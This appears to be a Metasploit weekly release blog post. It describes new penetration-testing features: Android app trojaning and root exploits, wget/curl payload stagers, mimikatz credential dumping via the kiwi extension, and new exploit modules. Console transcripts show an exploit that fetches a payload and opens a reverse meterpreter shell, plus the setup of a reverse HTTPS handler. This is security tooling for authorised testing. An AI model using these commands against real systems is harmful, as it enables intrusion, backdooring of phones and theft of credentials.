Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.
The rewrite of meterpreter for POSIX systems,
mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.
mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with
auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.
Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the
put_user bug which was exploited in the wild in 2013, as well as updates to the
towelroot exploit allowing it to target more devices.
This week's update adds CSV and vCard output formats to Android Meterpreter's
dump_contacts command. This means you can now dump an Android device's contact list in an importable format.
Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the
dump_contacts command now gives you the option of a normal text file, CSV, or vCard for the output format.
Here's how to use it:
meterpreter > dump_contacts -h Usage: dump_contacts [options] Get contacts list. OPTIONS: -f Output format for contacts list (text, csv, vcard) -h Help Banner -o Output path for contacts list meterpreter > dump_contacts -f csv [*] Fetching 4 contacts into list [*] Contacts list saved to: contacts_dump_20170121174248.csv meterpreter > dump_contacts -f vcard [*] Fetching 4 contacts into list [*] Contacts list saved to: contacts_dump_20170121174258.vcf
curl command stagers
If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.
This update brings wget(1) and curl(1) command stagers (
CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.
To use the new command stagers in your module, you can set
flavor: wget or
flavor: curl in your
execute_cmdstager call, or you can set the flavor in
CmdStagerFlavor in your
info hash. Lastly, if you're already running the module, you can change the flavor with
CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.
Here's an example of setting
msf > use exploit/linux/http/apache_continuum_cmd_exec msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129 rhost => 192.168.33.129 msf exploit(apache_continuum_cmd_exec) > set payload linux/x64/mettle_reverse_tcp payload => linux/x64/mettle_reverse_tcp msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget cmdstager::flavor => wget msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1 lhost => 192.168.33.1 msf exploit(apache_continuum_cmd_exec) > run [*] Started reverse TCP handler on 192.168.33.1:4444 [*] Injecting CmdStager payload... [*] Using URL: http://0.0.0.0:8080/XlM6PUw74P [*] Local IP: http://192.168.1.3:8080/XlM6PUw74P [*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:55171) at 2017-01-27 13:27:54 -0600 [*] Command Stager progress - 100.00% done (114/114 bytes) [*] Server stopped. meterpreter >
Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.
Metasploit stores your
msfconsole history in
~/.msf4/history but sometimes you only want dump out pieces of it. The new
history command works similarly to the bash command of the same name letting you do just that.
workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.
11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace default fbi * nasa wh.gov 11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- default 5 2 3 3 0 8 fbi 98 165 49 155 301 72 * nasa 32 81 41 14 33 20 wh.gov 1 9 0 0 0 0 11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >
handler command is another new command,
to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.
12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options Module options (payload/windows/meterpreter/reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path 12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1 LHOST => 192.168.99.1 12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > 12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888 LPORT => 8888 12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler [*] Payload Handler Started as Job 2 [*] Started HTTPS reverse handler on https://0.0.0.0:8888 [*] Starting the payload handler... 12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v Jobs ==== Id Name Payload Payload opts URIPATH Start Time Handler opts -- ---- ------- ------------ ------- ---------- ------------ 2 Exploit: multi/handler windows/meterpreter/reverse_https https://192.168.99.1:8888 2017-01-27 12:07:40 -0600 https://0.0.0.0:8888
Meterpreter now has a revamped
kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.
kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new
dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.
As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:
Kiwi Commands ============= Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerberos Retrieve Kerberos creds (parsed) creds_msv Retrieve LM/NTLM creds (parsed) creds_ssp Retrieve SSP creds creds_tspkg Retrieve TsPkg creds (parsed) creds_wdigest Retrieve WDigest creds (parsed) dcsync Retrieve user account information via DCSync (unparsed) dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync golden_ticket_create Create a golden kerberos ticket kerberos_ticket_list List all kerberos tickets (unparsed) kerberos_ticket_purge Purge any in-use kerberos tickets kerberos_ticket_use Use a kerberos ticket kiwi_cmd Execute an arbitary mimikatz command (unparsed) lsa_dump_sam Dump LSA SAM (unparsed) lsa_dump_secrets Dump LSA secrets (unparsed) wifi_list List wifi profiles/creds
If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.
And then you run the most important command that mimikatz offers:
meterpreter > kiwi_cmd coffee ( ( ) ) ._ _ _ . | |] \ / `----'
Exploit modules (6 new)
- Android get_user/put_user Exploit by cubeundcube, fi01, and timwr exploits CVE-CVE-2013-6282
- Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability by sinn3r, and Matt exploits CVE-CVE-2016-6433
- Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 by wvu, todb, 0x27, Kenzo, and Michael Messner
- PHPMailer Sendmail Argument Injection by Dawid Golunski, and Spencer McIntyre exploits CVE-CVE-2016-10045
- at(1) Persistence by Jon Hart
- DiskBoss Enterprise GET Buffer Overflow by Gabor Seljan, and vportal
Auxiliary and post modules (4 new)
- BAVision IP Camera Web Server Login by sinn3r
- Chromecast Wifi Enumeration by wvu
- Windows Local User Account Hash Carver by p3nt4
- Windows 'Run As' Using Powershell by p3nt4
As always, you can update to the latest Metasploit Framework with
msfupdate and you can get more details on the changes since the last blog post from GitHub: